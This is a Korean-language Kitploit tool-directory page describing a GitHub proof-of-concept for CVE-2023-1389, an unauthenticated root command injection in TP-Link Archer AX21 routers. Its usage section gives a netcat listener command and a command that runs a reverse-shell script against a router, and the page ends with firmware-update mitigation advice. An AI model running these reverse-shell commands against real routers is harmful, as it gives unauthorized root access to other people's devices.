Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-1389 — # CVE-2023-1389 개념 증명 스크립트 TP-Link Archer AX21의 인증되지 않은 명령 주입 취약점(CVE-2023-1389)에 대한 개념 증명 스크립트로, 파일 전송 및 리버스 셸 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/voyag3r-security/cve-2023-1389
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

# CVE-2023-1389 개념 증명 스크립트 TP-Link Archer AX21의 인증되지 않은 명령 주입 취약점(CVE-2023-1389)에 대한 개념 증명 스크립트로, 파일 전송 및 리버스 셸 기능을 제공합니다.

저장소 보기
17743년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

설명

CVE-2023–1389는 TP-Link Archer AX21 WiFi 라우터에서 발생하는 인증되지 않은 명령 주입 취약점입니다. country 매개변수의 콜백은 popen() 함수를 사용하며, 이 함수는 root 권한으로 실행되므로 공격자가 인증 없이 관리 인터페이스에 GET 또는 POST 요청을 통해 임의의 값을 주입할 수 있습니다. 취약점에 대한 자세한 내용은 여기에서 확인할 수 있습니다.

다음은 제가 명령 주입을 탐구하면서 만든 몇 가지 Proof-of-Concept입니다. Archer-file-transfer.py는 첫 번째 버전으로 상호작용 방식이 다소 복잡합니다. Archer-rev-shell.py는 간단한 netcat 리버스 셸을 제공하며, 아마도 여러분이 찾고 계신 바로 그것일 것입니다. 이 스크립트들의 개발 과정에 대해 더 알고 싶다면 여기 게시물을 읽어보세요.

사용법

한 터미널 창에서:

root@kitploit:~
nc your_IP listener_port

다른 터미널 창에서:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

완화 조치

TP-Link는 취약한 콜백을 제거하여 이 문제를 해결한 펌웨어 버전 1.1.4 Build 20230219를 출시했습니다. 라우터를 최신 펌웨어로 업데이트하면 장치를 보호할 수 있습니다.

향후 계획

이 PoC들을 유지보수하지 않을 가능성이 높습니다. 둘 다 매우 간단하며 필요에 따라 쉽게 수정할 수 있습니다.

도구 다운로드